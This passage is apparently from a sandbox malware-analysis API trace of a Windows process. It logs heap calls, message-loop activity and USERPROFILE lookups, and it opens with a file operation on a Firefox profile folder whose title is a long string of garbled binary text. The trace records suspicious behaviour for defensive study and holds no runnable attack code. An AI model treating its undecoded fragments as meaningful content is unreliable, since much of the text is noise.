pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0176.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0176.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0176.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0176.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0176.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0176.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0176.549] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0176.591] TranslateMessage (lpMsg=0x8cf968) returned 0 [0176.591] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0176.594] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0176.594] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0176.594] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0176.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0176.596] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0176.596] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0176.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0176.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0176.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0176.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0176.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0176.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0176.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0176.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0176.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0176.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0176.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0176.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0176.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0176.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Packages", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0176.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ackages", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0176.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ckages", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0176.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kages", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0176.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0176.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0176.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0176.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0176.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0176.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0176.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0176.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0176.606] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0176.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0176.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0176.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0176.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0176.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0176.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0176.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0176.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0176.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0176.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0176.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0176.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0176.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0176.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0176.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0176.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0176.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0176.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0176.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12) returned 0x29f6fc0 [0176.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0176.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Packages", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0176.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ackages", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0176.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ckages", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0176.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0176.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0176.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0176.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0176.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0176.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0176.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0176.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0176.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0176.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0176.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0176.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0176.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0176.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0176.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0176.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0176.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0176.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0176.612] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0176.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0176.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0176.612] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0176.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0176.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0176.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0176.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72708 [0176.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0176.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0176.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0176.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0176.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0176.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0176.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0176.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0176.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0176.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0176.614] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0176.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0176.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0176.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa750 [0176.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0176.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0176.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa600 [0176.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0176.615] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0176.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0176.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0176.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0176.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0176.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0176.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0176.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0176.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0176.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0176.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0176.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0176.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0176.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0176.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0176.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0176.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0176.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0176.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0176.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0176.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0176.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0176.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0176.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0176.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0176.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0176.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0176.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72738 [0176.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0176.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0176.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0176.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0176.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0176.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0176.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0176.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0176.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0176.616] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0176.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0176.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0176.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa540 [0176.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0176.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0176.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6d8 [0176.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0176.617] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0176.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0176.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0176.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0176.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0176.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0176.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0176.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0176.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0176.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0176.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0176.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0176.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0176.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0176.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0176.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 